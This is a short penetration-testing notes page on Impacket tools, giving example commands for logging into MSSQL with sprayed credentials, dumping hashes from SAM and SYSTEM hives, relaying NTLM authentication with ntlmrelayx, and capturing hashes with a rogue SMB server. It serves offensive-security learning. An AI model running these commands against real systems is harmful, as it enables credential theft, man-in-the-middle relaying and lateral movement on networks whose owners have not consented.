IMPACKET

Impacket is a collection of python classes for working with network protocols - This is what the official Github repository says, however impacket is a collection of tools that are incredibly useful in an offensive operation.

The tools can range from something as simple as psexec that can be used for remote code execution through SMB to more complicated attacks such as capturing hashes and relay spraying them across services to exploit a vulnerable service.

The following is the link to the impacket repository on Github,

https://github.com/fortra/impacket

MSSQL-Client

This is an alternate method for accessing the MSSQL server using the OS credentials. If you have OS credentials and the server runs MSSQL, then its best to spray the credentials to check whether access is available.

The following command can be used to access the MSSQL server,

impacket-mssqlclient 'particle42.com/db_user:user123$'@192.168.16.18 -windows-auth

Secrets-Dump

This tool can be used to dump the username and hash from the SAM and SYSTEM files in Windows,

impacket-secretsdump -system SYSTEM -sam SAM LOCAL -history 
impacket-secretsdump -system SYSTEM -sam SAM DOMAIN -history 

NTLMRelayx

This tool is one of the most important tool that can be used in a MITM attack. The tool can receive SMB, HTTP, MSSQL, LDAP, etc connections, extract the authentication creds and relay it to another services. Here is an example of relaying received creds to a SMB service,

impacket-ntlmrelayx -smb2support -t 192.168.16.19 -debug

SMBServer

This tool can be used for hosting an SMB service and print the received credentials. The credentials then can be cracked using hashcat or john.

impacket-smbserver -port 445 test /home/kali

Last updated